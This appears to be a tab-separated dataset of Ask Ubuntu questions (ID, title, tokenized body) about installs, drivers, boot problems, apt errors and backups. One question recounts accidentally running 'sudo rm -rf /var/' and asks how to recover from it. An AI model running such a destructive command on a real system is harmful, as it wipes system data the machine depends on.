236197	which has better compatibility with ubuntu - xps 13 / xps 14 ?	i am planning on buying a dell xps 13 or xps 14.. but really confused in choosing one.. will be installing ubuntu along side windows ( dual boot ) main purpose - web & mobile app development it seems xps 13 ( only pre-installed ubuntu - project sputnik ) is ubuntu certified and xps 14 is not . which one , out of the 2 laptops has better ubuntu compatibility and most apt for web development ? any help will be appreciated .
236199	ubuntu 12.10 - xinput test 8 command which shows where i am touching the screen , but its showing me nothing at all	i have xinput test 8 to see touch screen inputs . but since 5 hours i can not see where its touching . before 5 hours it was working fine . then i updated the kernel and also updated to latest kernel but the problem remain same as always . how can i make sure the xinput test 8 capture of touchscreen is working at all or not ? $ download http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.5.1-quantal/ wget http : //91.189.94.216/~kernel-ppa/mainline/v3.5.1-quantal/linux-image-3.5.1-030501-generic_3.5.1-030501.201208091310_amd64.deb wget http : //91.189.94.216/~kernel-ppa/mainline/v3.5.1-quantal/linux-image-extra-3.5.1-030501-generic_3.5.1-030501.201208091310_amd64.deb wget http : //91.189.94.216/~kernel-ppa/mainline/v3.5.1-quantal/linux-headers-3.5.1-030501-generic_3.5.1-030501.201208091310_amd64.deb wget http : //91.189.94.216/~kernel-ppa/mainline/v3.5.1-quantal/linux-headers-3.5.1-030501_3.5.1-030501.201208091310_all.deb sudo dpkg -i linux*.deb $ init 6 $ udevadm info -- export-db | grep elo e : id_model=elo_touchsystems_2700_intellitouch_r__usb_touchmonitor_interfac e : id_model_enc=elo\x20touchsystems\x202700\x20intellitouch\x28r\x29\x20usb\x20touchmonitor\x20interface e : id_serial=elo_touchsystems__inc._elo_touchsystems_2700_intellitouch_r__usb_touchmonitor_interfac_20e10439 e : id_vendor=elo_touchsystems__inc . e : id_vendor_enc=elo\x20touchsystems\x2c\x20inc . $ sudo evtest /dev/input/event3 input driver version is 1.0.1 input device id : bus 0x3 vendor 0x4e7 product 0x20 version 0x100 input device name : `` elo touchsystems , inc. elo touchsystems 2700 intellitouch ( r ) usb touchmonitor interface '' supported events : event type 0 ( ev_syn ) event type 1 ( ev_key ) event code 272 ( btn_left ) event type 3 ( ev_abs ) event code 0 ( abs_x ) value 0 min 0 max 4095 event code 1 ( abs_y ) value 0 min 0 max 4095 event code 40 ( abs_misc ) value 0 min 0 max 256 event type 4 ( ev_msc ) event code 4 ( msc_scan ) testing ... ( interrupt to exit )
236200	is downloading ubuntu via the windows installer a better alternative to using ubuntu within a virtual box ?	i will soon be starting an application support job and when i asked my soon-to-be line manager , `` what should i get to grips with before i start ? `` , he specifically stated that i should learn `` the principles and some general knowledge of linux/ubuntu '' . i believe that the best way to do this is to start using ubuntu and follow online tutorials . i am currently running windows 7 and was about to install ubuntu through a virtual box . while experiencing some problems with the install i came across the windows installer . i am a total beginner when it comes to ubuntu but considering how much easier it seems to be to use the windows installer , is it really a better alternative to using virtual box ( or something similar ) ? thanks
236201	ways to get help in ubuntu for beginners ( offline )	i was asked this today and got me wondering of the different ways a user could get help while using ubuntu . the particular case i was asked was , how to get help about ubuntu in ubuntu if there is no internet connection available . if it were not for that , i would had said askubuntu and the ubuntu forums first , followed by irc . but since it is offline it would be good to know , all the ways a user can get help about using ubuntu without having any online connection . particularly when using commands , how to navigate in ubuntu , how to use ubuntu and get to know it . this are common questions for some students that have started with me which are : students that have never used a computer ( 60+ year old students i should mention ) . the plus side is that they know how a typewriter works . students that have never used ubuntu before but are windows users . both cases they want to learn how to use ubuntu in a offline way , using only what help ubuntu comes with . of course they can also install any help packages needed before going offline forever , so installing a package not found in the default ubuntu setup is not a problem . the question should be treated as using the latest official version of ubuntu similar to what is the best place for learning how to use ubuntu ? but oriented toward offline usage .
236202	how do i contribute an autopkg test to ubuntu ?	how do i contribute an autopkg test for a ubuntu package ?
236205	tried to use deja-dup for backup , but it give the following error ( unicodedecodeerror : 'ascii ' )	is there a way to find the filenames that is causing this error ? traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1404 , in with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1397 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1277 , in main globals.archive_dir ) .set_values ( ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 691 , in set_values self.get_backup_chains ( partials + backend_filename_list ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 814 , in get_backup_chains map ( add_to_sets , filename_list ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 808 , in add_to_sets log.debug ( _ ( `` file % s is not part of a known set ; creating new set '' ) % ( filename , ) ) unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xd0 in position 3 : ordinal not in range ( 128 )
236207	how to restore all user settings to a previous time ? ( for use at a public lab )	i take care of a university public laboratory were the students have access to a limited account . they ca n't install anything , but they can alter the configurations of programs for the user . it is important that the audio configurations and audacity settings are always working perfectly , but some users , when face a 'malfunction ' like a disconnected microphone , alter all sorts of settings . i need a method to restore all user settings in a automated fashion , even if i have to do it machine by machine , ( by running a script for example ) . how can i do that ? note : we always use the latest version of ubuntu
236214	how to revert an 'apt-get remove ' action after pressing ctrl+z	i ran by mistake apt-get remove wrong_package , after realizing this , i pressed ctrl+z to break the process since removing that package started removing around 100+ other packages . now when i try to run apt-get install removed_ones it states : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . is there any way to revert it ?
236217	good spindown for hdd on media/nas server	i am running a small media server that also doubles as a nas drive in my house . i use it to host my plex library along with my subsonic library for roku and my droid 's . it 's a real simple atom server running two 1tb sata drives ( one on raid ) and a pico psu 150 12v power supply for limited power consumption . what i want to do though is set up drive spin down to keep it from heating up when not used and from using more power when not in use during the day . granted a lot of the day i am listening to music over subsonic , but there are times when i 'm not and no one is using it . 3 questions : 1 . what would be a good spindown time for this server ? to keep from problems with plex , subsonic and my nas requirements and to keep from ruining the drive from too much spindown then back up since that sooner or later will cause problems . should i set my raid drive to the same time , or more or less ? i have tried checking spindown but i can not using this command : sudo hdparm -i /dev/sdb | grep level returns nothing , when i run it without the grep i ca n't find anything that says level . i found this command for setting the spindown : sudo hdparm -s 25 /dev/sdb is this the correct way to do it ? once for each drive correct ? any other tips for managing this that anyone has experience with , maybe processor downtime or something of the sorts ?
236218	simulator for ubuntu phone	is there a simulator for ubuntu phone ? and if so : is there a tutorial using showing how to ?
236219	broadcom wireless 43142 conflict atheros 8161 in kernel 3.5 ( unbuntu 12.10 )	i am exactly in the situation of this question . however , my wireless card is a different model : i have a dell vostro 3460 with an atheros ar8161 ethernet card and a broadcom 43142 wireless card . i previously installed ubuntu 12.04 and having only the wireless card work , but no way to have the ethernet card work . now , i 've just upgrade to ubuntu 12.10 hoping having both cards work ( and also because it randomly frozen ) , but i am only able to make the ethernet card work ( using linux-backports-modules ) . for the wireless card , i am exactly in the situation of this reply : after installing the wireless-bcm43142-dkms_6.20.55.19-1_amd64.deb , when doing modprobe wl , i had the following error : fatal : error inserting wl ( /lib/modules/3.5.0-18-generic/updates/dkms/wl.ko ) : invalid argument as jasmine mentioned in his post , there can be conflict among stuffs for ethernet card and the ones for wireless card . thus , i try his commands : install cfg80211 /sbin/insmod /lib/modules/`/bin/uname -r`/kernel/net/wireless/cfg80211.ko but i got the following error : install : target `/lib/modules/3.5.0-18-generic/kernel/net/wireless/cfg80211.ko ' is not a directory i think the difference is that his kernel is 3.2 and mine is 3.5 . but i have no idea how to make it work
236220	how to compile glade from trunk	the text edit button for glade does n't work and i read in another link that i need to compile glade from 'trunk ' . i do n't know what that is , how do i compile glade from trunk and where do i go to get trunk .
236233	error message when trying to check for updates	i get the following error message whenever i try to check for updates : w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/precise-getdeb/release.gpg unable to connect to archive.getdeb.net : http : w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/precise-getdeb/apps/binary-i386/packages unable to connect to archive.getdeb.net : http : w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/precise-getdeb/apps/i18n/translation-en unable to connect to archive.getdeb.net : http : e : some index files failed to download . they have been ignored , or old ones used instead . do n't know what to do . please help .
236234	using ubuntu in a vm	if i wanted to make ubuntu apps could i download ubuntu into a vm and use ubuntu exactly the same way i use it on my computer , and what is a vm , what are it 's pro 's and con 's ?
236239	disable compiz in xfce and switching back to the normal window manager ?	after installing xfce on my ubuntu system , i tried enabling compiz with : compiz -- replace ccp & however , i have since been unable to remove compiz from the xfce login . i tried killing compiz , and now i do n't have any window manager , and opening the `` window manager '' and `` window manager tweaks '' pages in the settings panel brings me to an empty page . since i 've never really played around with xfce much i have no idea what window manager it uses . so i do n't know how to phrase reverting it to the old one . how can i revert back to the old manager ?
236240	lenovo ideapad z370 - power reated issues	i have a lenovo ideapad z370 and i 'm facing some problems . it consumes way more battery than it should , i got about 5 hours using windows 7 and about 2 hours using ubuntu ; if i try to install bumblebee in order to disable nvidia vga controller it 's useful since it stills turned on ; i 've changed some grub configs and add some script that i found online to solve some of the power related issues but it 's worse , after that when i unplug my laptop from power , it starts disabling my usb ports ( not using any usb device that needs much power ) . volume hotkeys are not working properly , once you try to use them , unity fails at some points and you 're unable to even shutdown your system .
236241	installing gearman on ubuntu 8.04.4 lts codename hardy	i am trying to install gearman on ubuntu 8.04 and this are the options i have . 1.install package dependencies sudo apt-get install make sudo apt-get install build-essential sudo apt-get install libboost-all-dev sudo apt-get install libevent-dev sudo apt-get install uuid-dev sudo apt-get install libcloog-ppl0 and make gearman from source 2.apt-add from a ppa but i guess 8.04 is too ancient so that might not work the first option almost works but sudo apt-get install libboost-all-dev sudo apt-get install libcloog-ppl0 give e : could n't find package i have done some searching on packages dot ubuntu dot com but libboost-all-dev and libcloog-ppl0 are not available for hardy . what other option do i have to install the missing packages ? .
236247	how to assign one cpu to one process ?	how to assign one cpu to one process so that no other process can use that cpu while the process with that pid is running on that cpu ?
236250	ca n't find steam folder	i recently installed steam and tf2 via playonlinux , and i need to find the steam folder , on windows it is on program files . any ideas on where could i find it ? ? thanks
236255	thinkfan on thinkpad t410 - thinkpad_acpi does n't seem to support fan_control	i try to run thinkfan . i installed it and configured it . but if i do this i get an error . chris @ chris-thinkpad-t410 : ~ $ sudo thinkfan -n warning : using default temperature inputs in /proc/acpi/ibm/thermal . config as read from /etc/thinkfan.conf : fan level low high 0 0 42 1 40 47 2 45 52 3 50 57 4 55 62 5 60 67 6 65 72 7 70 77 127 75 32767 module thinkpad_acpi does n't seem to support fan_control how to solve this ?
236260	good icon theme for programming ?	i ca n't find any gnome icon theme that highlights source code files , especially c and c++ . any suggestion ? edit . i tried nitrux , it does n't have the icons for languages ( c , c++ , etc ) . oxygen does have the icons , although i do n't much like the looks of it . i sometimes use nouvegnome , but its support for languages is small . well , i think oxygen will have to do for now . thanks ppl .
236261	installing avr gcc	when i tried to install avr gcc on my ubuntu then it says internet connection error.though all the connections are ok.and installing arduino ide also seems to be a problem because the same thing happens .
236263	browse .img without mounting	is there anyway to browse a .img file without mounting it ? i have an .img file which i have generated from a clonezilla partition snapshot . i somehow have problems mounting the file with the command mount -o loop sda5.img /mnt/ . dmesg | tail shows me the following error : [ 1325.395286 ] ext4-fs ( loop0 ) : bad geometry : block count 11221248 exceeds size of device ( 11218432 blocks ) anyone got an idea how to browse without mounting or what might be causing this error ?
236265	i get a blank desktop with no icons , menu and bar	i setup the ubuntu 12.10 for first time , when i login . desktop appear but there is no bar ! there is no right click action there is nothing else ! ... only terminal is working with press : alt+ctrl+t ! the cursor moves but i see nothing else on the screen . this is my first try with ubuntu , any help would be greatly appreciated . thanks ...
236272	is transcoding 24bit flac to 16bit oggvorbis an issue ?	i have a bunch of hq recordings as flac with 24bit resolution . they take too much space on my android device , and ogg achieves transparent sound ( particularly when on the go with noise around me ) at much lower bit rates . ( i do not want to start a discussion about what differences people might think they can hear at this point . ) to convert flacs to ogg , i can just do oggenc -q 6 *.flac because oggenc can directly read in flac - which is great . since i am not a sound engineer , i was wondering if i am cocking-up here . afaik ogg works with 16bit . anything to take care of when going from 24 to 16bit ? besides the bit resolution , is resampling from 96 khz ( or more ) to 44.1 ( or 48 khz ) problematic ? on software side this is pretty easy to achieve , just with : oggenc -q 6 -- resample 44100 *.flac practically the outcome is fine . the oggs sound great . however , the theoretical considerations keep my mind busy . is the conversion from 24 to 16 bit and the resampling from 96+ khz to 44100 khz a problem from the point of sound mastering ? thanks !
236275	how do you remove individual packages from the list in synaptic package manager ?	i would like to be able to remove references to a particular , individual package in a repository . if i do not want install something it would be nice to speed up apt-get update ( by skipping those ) and have a cleaner synaptic screen .
236276	what hardware does ubuntu touch support ?	with the announcement of the ubuntu phone os i 'd like to know what phone ( and tablet ) models are supported at this time . note from foss & oli : we are making this the master question for all future `` will this work on < insert random tablet/phone/device here > ? ! '' questions
236279	how to access ubuntu server 12.10 via hostname,	i had it working , but then installed lamp and a few other things to set up a webserver , now putty only allows connection via ip , which works , and webmin worked with hostname as well , until now ... i checked the hostname on the server # hostname this returned the correct name that i gave it in the /etc/hosts file . 127.0.0.1 localhost 192.168.1.34 dlna2 also , now that the mysql and phpadmin are installed , along with apache2 , how do i make webpages , then get it online ? do i use dyndns ? mike\
236280	intel cedarview graphic driver ubuntu 12.04 on netbook acer aspire one d270	i 've tried to install ubuntu 12.10 but it was very slow and was not working properly . i decided to install the 12.04 version and is working fine . now there is the intel cedarview graphic driver available and i was wondering if i should activate it or not or more specifically , if anyone has tested it and if it is working fine ? it says : `` this driver is required to fully utilise the 3d potential of some intel cedarview cards , as well as provide 2d acceleration of newer cards . '' thanks in advance !
236288	apt-get asks me to insert cd , why ?	i tried to install several package before and it happened before , actually iăžm getting this for sudo apt-get install libvte-dev and this is the tail ... 0 upgraded , 56 newly installed , 0 to remove and 0 not upgraded . need to get 10.9 mb/14.9 mb of archives . after this operation , 62.2 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //cz.archive.ubuntu.com/ubuntu/ precise/main zlib1g-dev amd64 1:1.2.3.4.dfsg-3ubuntu4 [ 165 kb ] media change : please insert the disc labeled 'ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ' in the drive '/media/cdrom/ ' and press enter i 'm online . where is the problem ? note : i installed ubuntu from usb stick - i have no cd
236292	is ubuntu phone os going to include tools for development within the mobile platform ?	i saw examples od native qml and html5 applications , but ubuntu is not linux if one ca n't develop on it locally . will ubuntu phone contain gcc , qmake , a python shell or similar tools ?
236293	is there a way to install the ubuntu phone demo sdk on ubuntu 12.04 ?	i thought `` why not start with the new shown ubuntu phone seems noob to coding friendly enough '' except when installing the qt stuff it says `` not found '' . i did apt-get update is it only possible on 12.10 , i just installed ubuntu and do n't want to have to re-install . when i run apt-get update , i got this : w : failed to fetch http : //ppa.launchpad.net/ui-toolkit/ppa/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ui-toolkit/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i think that has to do with the fact i 'm on 12.04 .
236298	gui - installing on top of a server	i installed ubuntu-12.04-x86_64 server . i need a gui to install mysql db . what is the simplest way ? i still want to preserve my server . i do n't want to make it to run as a desktop . all i need is a gui . thanks for your help .
236301	brother mfc 240c will not print but shows job as completed	i 'm using a usb connected brother mfc-240c printer with ubuntu 12.10 . i installed the printer with the printer drivers found online with the printers tool . however , when i perform a print operation , the print queue says job completed when nothing happens at the printer .
236306	increase the font size in text editor of ubuntu	i am new to ubuntu10.10 , the text editor font size are very small.i searched in the menu bar , no option in the text editor to increase the font size . or if not any shortcode to increase the zooming of screen like ( ctrl++ in browser ) . any help would be greatly appreciated .
236309	remove second ubuntu installation	i have two partitions on my disk : /dev/sda1 30g /dev/sda3 270g somehow i 've installed ubuntu 12.04 on each of the two partitions . so now i have two ubuntu installations which are both listed on the grub boot menu . i would like to erase one of the partitions ( /dev/sda3 ) and use it just for data backup . i would also like to have only one entry for ubuntu in the grub menu so that i do n't have to choose it every time i reboot . how can i achieve this ?
236315	hide boot drive from nautilus	i have a boot drive which i do n't want to show up in nautilus . how do i edit /etc/fstab so that the boot drive does n't show up as a mountable device . current /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda2 during installation uuid=595815c2-d882-4ec8-a2cd-cce70471167c / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda6 during installation # uuid=1340a336-66ca-4743-a6e4-41a307af2dda /boot ext4 defaults 0 3 # swap was on /dev/sda5 during installation uuid=afa49f1d-d505-4166-82a2-2f44548a48c6 none swap sw 0 0 uuid=deb86039-528a-45f3-b5f9-ce528740c94e /data_hdd ext4 defaults 0 2 the drive shows up in unity 's launcher as well :
236322	how can i easliy boot ubuntu and windows 8 ?	i 've had various problems with ubuntu and windows 8 on dual-boot , how can i solve this in an easy manner without messing my partitions or my boot loader ?
236325	thinkpad w520 brightness modification requires suspend	i have a lenovo thinkpad w520 with 12.10 installed on it . the specifics are : linux corellia 3.5.0-19-generic # 30-ubuntu smp tue nov 13 17:48:01 utc 2012 x86_64 x86_64 x86_64 gnu/linux it works fairly well , but i have one main issue with it - the brightness controls on my keyboard ( or if i go into the display menus ) do n't work properly . when i touch the brightness down on my keyboard , it shows the gnome brightness control bar going down in the upper right corner of the screen , but it does n't actually affect the brightness . actually , what it does is that it does n't affect the brightness initially . if i suspend the laptop by closing the lid and then restoring it , it will come back on with the specified brightness setting . my intuition is that this has something to do with having an improper kernel ( i.e . i 've heard thinkpads require a special acpi kernel ) , but i read ( in my previous attempts to solve this problem ) that newer kernels ( since i think 2.6 ) had it integrated in the trunk , and thus did n't need a special package . not that long ago , i actually upgraded from 64-bit 11.04 ubuntu , which worked a bit better . specifically , acpi actions worked really well there . so , i 'm wondering if perhaps i forgot a configuration issue i did when i first set up 11.04 .
236327	unable to set mouse in vim under ubuntu 12.04	for some reason , i am unable to perform the : set mouse=a command in vim . i have installed pretty much every vim related package from apt that seems applicable . vim version is 7.3 ( huge version with gtk2-gnome gui ) . +x11 is included . this is a new workstation , with a previously installed version of ubuntu ( that i ca n't change , because this is a work computer ) . i 've never had a problem with this in the past , and have other machines where this works fine , running 12.04 , 12.10 , and older versions of ubuntu . any help is much appreciated .
236329	wireless access point with login/landing page	i´m investigating how to setup a wireless access point in a linux ( ubuntu , in my case ) pc where is mandatory to login/register using a backend module that i have developed . i know that exist some software solutions like chilli or easyhotspot that may satisfy the requirements for most people , but i want to implement a custom solution . the workflow should be as follows : when the user tries to connect to internet via my wireless access point a custom landing page always appears . in other words , the wireless access point must redirect always to a ( for example ) index.html page . the page contains a login/registration form that points to some backend endpoints . the backend endpoints that enable login and registration are my own and are deployed in a web server . if the login/registration operation is success then the user get internet access . i´ve read ton of blog posts , forum threads , etc . but i found nothing . what i want to do looks simple , but i don´t know how to develop something like that . i don´t mind if i have to develop that solution in python , c , bash scripting ... any tutorial , tips , suggestions would be very appreciated . thank you very much in advance for your help ! best regards , luis cappa .
236330	laptop wo n't boot at all	i just installed ubuntu 12.10 on my 5 year old acer aspire laptop with vista 32bit on it . i updated everthing with `` software installer '' . downloaded some recommended apps like the youtube app and some media codec everyone was talking about . i downloaded a language pack in dutch ( ftw ) . then the updater said i should restart the computer , and so i did . when i try to boot the laptop now it gives me a black screen with the regular lights flashing on my laptop . i can hear the cd drive trying to run something . the laptop makes some last noises and then it shuts itself down . i installed ubuntu on my d drive . my hdd is virtually split in half , c and d. c is my main drive and has vista . i formated the computer first and reinstalled vista . i used the windows ubuntu installer , i dont have an cd or usb with ubuntu . this is my laptop : http : //support.acer.com/acerpanam/notebook/0000/acer/aspire5735z/aspire5735zsp3.shtml the # ubuntu irc live support channel helped me . they told my to pull out the battery and hit the power button a few times . then when i put in my battery again it booted again !
236332	accidentally deleted *some* of /var , but have an old backup , how can i fix this ?	i 'm on 12.04lts . i had an old os disk mounted at /media/backup/ , and i was converting it to use as a backup disk . i accidentally ran sudo rm -rf /var/ rather than sudo rm -rf var/ , and deleted some of my /var/ before catching my mistake with ^c . i recopied across some files from /media/backup/var/ using cp -na /media/backup/var/specific_path/* /var/specific_path/ , mainly doing the obvious here ( folders in /var/ which had fewer files than in /media/backup/var/ for example ) . a few things were obviously not working : totem complained from the command line that it was unable to connect to jack ( this is important as the machine is a htpc running mythtv ) some programs complained that there is no /var/lib/dbus/machine_id , and this folder and file was not recreated on reboot ( i had expected it might be ) once i felt i had done enough , i tried a reboot . the tty7 fails , and i get a text-based login . do i need to copy across some gdm files ? my old installation had been gradually upgraded to 12.04lts from 8.04lts originally . i 'm guessing its var/ has some legacy folders that i do n't need to reproduce in my /var/ . for example it has a var/lib/gdm/ folder , but /var/lib/ does n't . then again i thought gdm had been deprecated ? can i do a 'repair ' using an installation cd , or is there a way to use my backup to repair the rest ? update cp /media/backup/var/lib/gdm/* /var/lib/gdm/ got me to the point where i can boot to the desktop . i 'm now in a less critical state , but my question above still stands : is there a way to detect what should be missing , or force some sort of intelligent dpkg-reconfigure for just those packages with missing files ?
236336	how to remove the `` install ubuntu '' splash from a live usb	i want to use usb sticks for teaching a programming class , so i do n't want the `` install ubuntu '' option splash at the start , is there a way to edit a start-up file to stop this ?
236340	burg for ubuntu 12.10	hey guys i just shifted from win 7 to ubuntu with dual boot . and dont like the looks of grub so would like to install burg..would like to know that burg is compatible with 12.10 or not . and if yes then please let me know exact steps to download it . also is there any way to change the looks of my desktop ? thanks
236347	problem with grub , ca n't boot in any os	im dual booting ubunto and windows 7 anyway a couple of days ago i was editing the grub to enable the graphical interface for backtrack , anyway i screwed up the grub accidently , now i ca n't load neither of the systems because of the 'minimal bash-like ' screen . is there a way i could delete ubunto to boot in windows 7 ? or how could i fix this since i need to boot in win7 urgently . thanks a lot !
236349	tar by file creation date and extraction of a file by its file name	obviously , there are a lot of web pages on tar out there . however , i have not been able to find a suitable google query to determine if what i want is even possible . i have found items such as : http : //stackoverflow.com/questions/848293/shell-script-get-all-files-modified-after-date but this is set to archive files newer than a certain date not older than a certain date . long story short , i have several automation tools that generate data files and log files every 5 minutes . the data files are named using php 's md5 function so they are a 32 char string . the log files vary in their naming convention but generally include the date in the name . i 'd like to use tar to archive and compress these data files and logs ( separate archives for each ) based on the creation or last modified date - i.e . archive any file with a creation date more than a week old . is this possible and if so , can you please provide the command ? second , with respect to these files i 'm archiving them instead of deleting them because i will ( occasionally ) wish to look at them again . with files being created every 5 minutes a lot of files get generated . i 'd like to extract only the file i 'm interested in and not all of them . is there any easy way to do this ? my intention would be to archive weekly and delete the archives after they reach approx 6 months of age . thanks
236350	can ubuntu be installed on vmware ?	i have attempted to install both 12.4 and 12.10 on both fusion 5 and vmware player without anything related to success . with fusion , it crashes at login attempt , with vmware player , it crashes during install . no error logs ( that i know of ) just abject failure .
236351	ubuntu dash not searching for files	i 've just installed ubuntu 12.10 and i 've found that in the dash i ca n't look for files that i have n't opened yet , eg : i have a huge collection of pdf files and when i look for them on the dash i can only find the ones i 've opened . how can i correct this ? is there any way of changing the dash search settings ? thank you .
236352	computer freezes when logging in after updates	i am running ubuntu 12.04 and yesterday i installed a few updates . i cant recall which . afterwards i shut down the pc . today when booting up , i can see strange artifact behaviour in the login screen . a few black blocks appeared . and as i type my password i can see some white jibber appearing in the black blocks . when providing my password and logging in , the computer freezes ( black screen ) , monitors go into sleep mode and all i can do is force off the pc . however i am able to log in succesfully as guest ! ! how can i troubleshoot my pc , i noticed i can not sudo from the quest account .
236358	i managed to install the os , but i ca n't see anything in my monitor since it says `` not supported resolution ''	my computer screen is atvio brand , but when i used another screen ( samsung ) the os works fine , can someone help me ?
236361	why is 12.10 quantal quetzal only supported until 2014 while 12.04 lts precise pangolin is supported until 2017 ?	i 'm not very familiar with linux , but i 'd like to know why the newer version is supported only until 2014 . what does this mean as far as upgrading ?
236362	ubuntu opengl issues	my opengl does n't work at all i get xlib : extension `` glx '' missing on display `` :0 '' . lspci output 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0126 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:1246 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) dmesg | grep -i nvid [ 9.469068 ] nvidia : module license 'nvidia ' taints kernel . [ 9.538786 ] nvidia 0000:01:00.0 : power state changed by acpi to d0 [ 9.538792 ] nvidia 0000:01:00.0 : power state changed by acpi to d0 [ 9.538796 ] nvidia 0000:01:00.0 : enabling device ( 0006 - > 0007 ) [ 9.538803 ] nvidia 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 9.538809 ] nvidia 0000:01:00.0 : setting latency timer to 64 [ 9.538942 ] nvrm : loading nvidia unix x86_64 kernel module 304.48 sun sep 9 [ 10300.955799 ] nvidia 0000:01:00.0 : restoring config space at offset 0xf ( was 0x100 , writing 0x10b ) [ 10300.955803 ] nvidia 0000:01:00.0 : restoring config space at offset 0xc ( was 0x0 , writing 0xfff80000 ) [ 10300.955807 ] nvidia 0000:01:00.0 : restoring config space at offset 0x9 ( was 0x1 , writing 0x4001 ) [ 10300.955811 ] nvidia 0000:01:00.0 : restoring config space at offset 0x7 ( was 0xc , writing 0xd000000c ) [ 10300.955814 ] nvidia 0000:01:00.0 : restoring config space at offset 0x5 ( was 0xc , writing 0xc000000c ) [ 10300.955817 ] nvidia 0000:01:00.0 : restoring config space at offset 0x4 ( was 0x0 , writing 0xf0000000 ) [ 10300.955820 ] nvidia 0000:01:00.0 : restoring config space at offset 0x3 ( was 0x800000 , writing 0x10 ) [ 10300.955823 ] nvidia 0000:01:00.0 : restoring config space at offset 0x1 ( was 0x100006 , writing 0x100007 ) my computer is a dell xps l702x
236365	how to find partition name of usb drive	i am trying to install clonezilla to my usd drive . at the very last step i need to run sudo makeboot.sh /dev/sdb but i got this error information '' /dev/sdb '' is not a valid partition name but when i run sudo fdisk -l i got this information disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0009b200 device boot start end blocks id system /dev/sda1 * 2048 60158297 30078125 83 linux /dev/sda2 616775678 625141759 4183041 5 extended partition 2 does not start on physical sector boundary . /dev/sda3 60160000 616773631 278306816 83 linux /dev/sda5 616775680 625141759 4183040 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdb : 4089 mb , 4089446400 bytes 126 heads , 62 sectors/track , 1022 cylinders , total 7987200 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x69737369 this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdb1 ? 1869771365 2038460886 84344761 69 unknown /dev/sdb2 ? 1701519481 3571400945 934940732+ 73 unknown /dev/sdb3 ? 2573 2573 0 74 unknown /dev/sdb4 2885681152 2885733566 26207+ 0 empty so it looks like ths partition name for usd drive is /dev/sdb , something i am missing ? thanks
236372	restore name of windows partition to devices list in home folder	1 ) begin with acer netbook aspire one windows 7 starter 2 ) partitioned drive and installed ubuntu 12.04.1 lts on separate partition 3 ) has worked very well for a long time can boot windows or ubuntu - i love it i can access windows drives from ubuntu and move files between at will until now problem is ubuntu home folder has lost the windows partition `` acer '' from the list of devices where it used to show '' acer '' ( name of windows partition ) '' system reserved '' ( name of windows recovery partition ) it now shows only `` system reserved '' i have somehow deleted or removed `` acer '' from the list of devices when logged on as primary owner user if i switch users and log on as guest the list under devices shows '' acer '' '' system reserved '' and file manipulation works as it should between ubuntu and windows partitions if i boot windows it works as it should how do i restore `` acer '' to the devices list when logged on as primary owner user
236377	how can i tell that apparmor is working ?	some questions i want answered in the answer : how do i know if apparmor is running ? how can i tell if it 's working well ?
236379	is it possible to install ubuntu 12.04 on usb drive while retaining windows 8 on hdd ?	let me explain what i am trying to do in detail ... i want to install ubuntu 12.04 ( or 12.10 ) on a 320gb usb drive , and set the boot order to boot usb first . that way , if i want 12.04 to boot , i just have to start my machine with the driver inserted , and if i want to boot windows , i start it with it disconnected . i have done this on previous computers , but this machine is windows 8 uefi , which i have never done before . i do not have a deep understanding of how uefi works , but i want my main machine to remain completely untouched by ubuntu , and i do not know if this is possible with the new uefi setup . my machine is a fujitsu lifebook ah532 > 2.3ghz intel i3 > 6gb ram
236381	what is apparmor ?	i hear a lot of talk about apparmor , i want to know the following : what is apparmor ? how does apparmor work ?
236383	ess wo n't fully install ubuntu 12.04	the last time i ran sudo apt-get upgrade ess gave this error and now says its not fully installed . i checked and installed all dependencies and could n't find any other reports of this issue . i also tried completely removing and re-installing ess with no luck . enabling speedbar support [ ess-r-d : ] ( autoload .. ) & ( def** .. ) wrong number of arguments : define-obsolete-function-alias , 3 xemacs exiting . emacs-package-install : /usr/lib/emacsen-common/packages/install/ess xemacs21 emacs23 xemacs21 failed at /usr/lib/emacsen-common/emacs-package-install line 30 , < tsort > line 1. dpkg : error processing ess ( -- configure ) : subprocess installed post-installation script returned error exit status 255 errors were encountered while processing : ess e : sub-process /usr/bin/dpkg returned an error code ( 1 )
